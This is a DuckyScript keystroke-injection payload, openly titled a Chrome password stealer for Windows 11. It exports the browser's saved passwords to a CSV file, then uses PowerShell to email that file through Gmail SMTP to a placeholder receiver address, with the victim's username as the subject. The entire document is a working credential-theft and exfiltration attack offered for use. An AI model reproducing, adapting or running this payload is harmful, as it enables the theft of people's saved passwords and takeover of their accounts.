REM Author: Brayan Caldera
REM Ducky chrome password stealer for Windows 11  
Delay 1000
REM ----------- opens chrome web browser
GUI r
DELAY 500
STRING cmd
DELAY 400
ENTER
DELAY 600
STRING start chrome --args --profile-directory=Default
DELAY 500
ENTER
DELAY 500
REM ----------- exports passwords into csv file
STRING chrome://settings/passwords
ENTER
DELAY 1000
TAB
DELAY 100
TAB
DELAY 100
TAB
DELAY 100
TAB
DELAY 100
TAB
DELAY 100
TAB
DELAY 100
TAB
DELAY 100
TAB
DELAY 100
ENTER
DELAY 200
ENTER
DELAY 200
ENTER
DELAY 700
STRING chromepasswords.csv
DELAY 200
DELAY 200
ENTER
DELAY 1000
CONTROL W
DELAY 100
REM -------------- sends it by email using powershell
GUI r
DELAY 200
STRING powershell
ENTER
DELAY 500
STRING $SMTPServer = 'smtp.gmail.com'
ENTER
DELAY 100
STRING $SMTPInfo = New-Object Net.Mail.SmtpClient($SmtpServer, 587)
ENTER
DELAY 100
STRING $SMTPInfo.EnableSSL = $true
ENTER
DELAY 100
REM ---Make sure to enable less secure app access to sender's mail here: https://myaccount.google.com/lesssecureapps
STRING $SMTPInfo.Credentials = New-Object System.Net.NetworkCredential('SENDER_MAIL@gmail.com', 'SENDER_PASSWORD')
ENTER
DELAY 100
STRING $SMTPServer = $E = New-Object System.Net.Mail.MailMessage
ENTER
DELAY 100
STRING $E.From = 'SENDER_MAIL@gmail.com'
ENTER
DELAY 100
STRING $E.To.Add('RECEIVER_MAIL@gmail.com')
ENTER
DELAY 100
STRING $E.Subject = $env:UserName
ENTER
DELAY 100
STRING $E.Body = 'Success! The password file is attached!'
ENTER
DELAY 100
STRING $F = 'Documents/chromepasswords.csv'
ENTER
DELAY 100
STRING $E.Attachments.Add($F)
ENTER
DELAY 100
STRING $F = $SMTPInfo.Send($E)
ENTER
DELAY 100
STRING exit
ENTER
